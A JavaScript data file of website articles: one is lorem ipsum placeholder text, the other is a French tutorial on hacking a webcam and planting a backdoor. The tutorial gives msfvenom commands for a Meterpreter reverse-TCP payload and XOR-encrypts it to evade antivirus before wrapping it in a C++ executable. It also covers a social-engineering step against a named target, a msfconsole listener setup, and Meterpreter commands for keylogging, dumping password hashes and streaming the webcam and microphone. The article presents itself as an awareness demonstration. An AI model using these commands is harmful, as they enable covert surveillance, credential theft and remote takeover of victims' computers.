const articles = [
    {
        id: 0,
        title: "Titre",
        extracts: ["https://www.youtube.com/embed/ZQKdayVotaI?list=RDZQKdayVotaI","https://www.youtube.com/embed/ZQKdayVotaI?list=RDZQKdayVotaI"],
        video: "https://www.youtube.com/embed/ZQKdayVotaI?list=RDZQKdayVotaI",
        text: [
            {
            type: "paragraph",
            text: "Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Tristique senectus et netus et malesuada fames ac turpis. Integer feugiat scelerisque varius morbi enim nunc faucibus. Phasellus egestas tellus rutrum tellus pellentesque. Viverra maecenas accumsan lacus vel. Eget arcu dictum varius duis at consectetur lorem donec. Tincidunt id aliquet risus feugiat in ante. Interdum velit euismod in pellentesque massa placerat duis ultricies. Scelerisque viverra mauris in aliquam sem fringilla. Scelerisque varius morbi enim nunc faucibus. Nullam ac tortor vitae purus faucibus ornare suspendisse. Consequat interdum varius sit amet mattis. Nunc sed augue lacus viverra vitae congue eu. Elit duis tristique sollicitudin nibh sit amet. Porttitor lacus luctus accumsan tortor posuere ac ut consequat semper. Tortor pretium viverra suspendisse potenti nullam ac tortor vitae purus."
            },
            {
                type: "paragraph",
                text: "Imperdiet nulla malesuada pellentesque elit eget gravida cum sociis natoque. Mattis ullamcorper velit sed ullamcorper morbi tincidunt ornare massa. Fusce id velit ut tortor pretium viverra suspendisse potenti nullam. Urna et pharetra pharetra massa massa. Quis varius quam quisque id diam vel quam. Sapien nec sagittis aliquam malesuada bibendum arcu vitae elementum. Pellentesque elit eget gravida cum sociis. Elementum nibh tellus molestie nunc non blandit. Vitae turpis massa sed elementum tempus egestas sed sed risus. Suspendisse ultrices gravida dictum fusce. Tortor at auctor urna nunc id cursus metus aliquam. Porta lorem mollis aliquam ut porttitor leo a. Molestie at elementum eu facilisis. Pellentesque habitant morbi tristique senectus."
            }
            ],
        abstract:""
    },
    {
        id: 1,
        title: "Hack de webcam et exploitation de backdoor",
        extracts: ["https://www.youtube.com/embed/LkZKeOaiqv8","https://www.youtube.com/embed/B9hHjFQFRcY"],
        video: "https://www.youtube.com/embed/Sa1kG9cIwZg",
        text:[
            {
                type: "paragraph",
                text: [
                    "Les attaque informatiques sont omniprésentes et de plus en plus complexes. Les médias d'information et la fiction représentent très peu ces attaques pourtant fréquentes. Nous avons donc décidé de répliquer un piratage de webcam et l’accès à un ordinateur à distance.",
                    "La toute première étape est la création d’outils. Dans notre cas nous avons créé des programmes en Python pour chiffrer le fichier exécutable de notre virus. Nous avons aussi écrit un programme en C++ qui sera le logiciel final. Il incorpore le virus chiffré, est capable de le déchiffrer et de l’exécuter.",
                    "Il faut sélectionner une cible, dans notre cas c’est Lilian. On peut rechercher des informations pour paraître légitime lorsqu’il faudra le contacter. C’est l’ingénierie sociale.",
                    "On crée le virus en utilisant Metasploit Framework."
                ]
            },
            {
                type: "code",
                text: [
                    "msfvenom −p windows/x64/ meterpreter_reverse_tcp −e x86/shikata_ga_nai −i 10",
                     "LHOST=ADRESSE_IP LPORT=4444 −f raw −o reverse_tcp"
                    ]
            },
            {
                type: "paragraph",
                text: [
                    "Une fois créé on utilise un programme Python qui implémente l’algorithme de chiffrement Xor.. Cela permet d’empêcher la plupart des antivirus de détecter notre porte dérobée. \n",
                    "On inclut le résultat dans notre programme C++, puis on le compile et il ne reste qu’à l’envoyer.",
                    "Lorsque la victime va cliquer sur l’exécutable, son ordinateur va tenter de se connecter à celui de l’attaquant. Avant cela il faut donc écouter en attente de la connexion."
                ]
            },
            {
                type: "code",
                text: [
                    "msfconsole",
                    "set PAYLOAD windows/x64/meterpreter_reverse_tcp",
                    "set LHOST 192.168.102.44",
                    "set LPORT 4444",
                    "set StageEncoder x86/shikata_ga_nai",
                    "exploit"
                ]
            },
            {
                type: "paragraph",
                text: [
                    "Lorsque la victime est connectée, on dispose d’un terminal pour :"
                ]
            },
            {
                type: "list",
                text: [
                    "récupérer les entrées clavier : keyscan_start pour commencer l’écoute puis keyscan_dump pour voir ce que la personne a écrit",
                    "récupérer des documents: download C::\\myPicture.png et , les modifier avec edit document.txt et en ajouter : upload monvirus.exe c:\\windows\\system32",
                    "lancer des logiciels execute -f cmd.exe -i -H",
                    "trouver ses mots de passes : run post/windows/gather/hashdump",
                    "afficher sa webcam : webcam_stream et écouter au micro : record_mic"
                ]
            }


        ],
        abstract: ""
    }
];

export default articles;

